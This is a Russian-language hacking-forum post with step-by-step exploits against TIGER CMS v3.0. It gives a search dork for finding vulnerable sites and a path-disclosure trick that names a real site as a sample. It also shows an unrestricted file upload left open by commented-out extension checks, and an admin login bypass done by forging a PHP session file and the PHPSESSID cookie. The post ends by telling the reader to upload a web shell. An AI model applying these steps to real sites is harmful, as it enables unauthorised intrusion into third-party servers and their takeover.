Форум АНТИЧАТ - Уязвимости TIGER CMS

Уязвимости TIGER CMS

Product : TIGER CMS
Vesrion : v3.0
Site : осторожно сплойт!(не мой) http://tigercms.com/
Discovered by: Dimi4
Dork:"Powered by TIGER CMS v3.0"

Path Disclosure
Проканывает обычно на win, либо nix с криво выставлеными правами.
Sample : http://bobruisk.name/admin/engine/modules/uploads/

Usage:

Код:

http://site.com/path/admin/engine/modules/[module_name]

Стандартные модули, которые подходят для этой цели:

Цитата:

uploads
content
links
metatags
news
pass
templates

Заливка произвольного файла
Непонятно для чего, но вина всему - 2 закоментированые по дефолту строчки.

PHP код:


		
			
$type = strtolower(substr($filename, 1 + strrpos($filename, ".")));

            //$types_ok = array("jpg", "bmp", "gif", "png");

            //if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Неверный формат файла.");



            $new_name = 'tiger-'.time().'.'.$type;

            $a = copy($file, "../uploads/".$new_name);

            $path_all = getenv("SERVER_NAME");

http://site.com/path/admin/?task=uploads&sub_task=add

Обход авторизации в админке.
Need:

Шелл на соседнем сайте
Доступ на запись в /tmp

Уязвимый код:
admin/login/login2.php

PHP код:


		
			
             $_SESSION['user_id_admin'] = $id_admin;

             $Admins->SuccessAuth($login);

Для удачного логина нам потребуется логин админа. Рискнем предположить что это "admin"
Составляем сесию:
Имя: sess_0526152ea0fed5dbbfca86639e0f6fa7
Содержимое:

Код:

user_id_admin|s:1:"1";

Сохраняем в /tmp
Не забудьте поставить права 777!
Далее в браузере подделываем куки:

Код:

PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7

Идем:
http://site.com/path/admin/, Удачно прошли авторизации, заливаем шелл как описано выше.

Спасибо нолику за статью по реверс айпи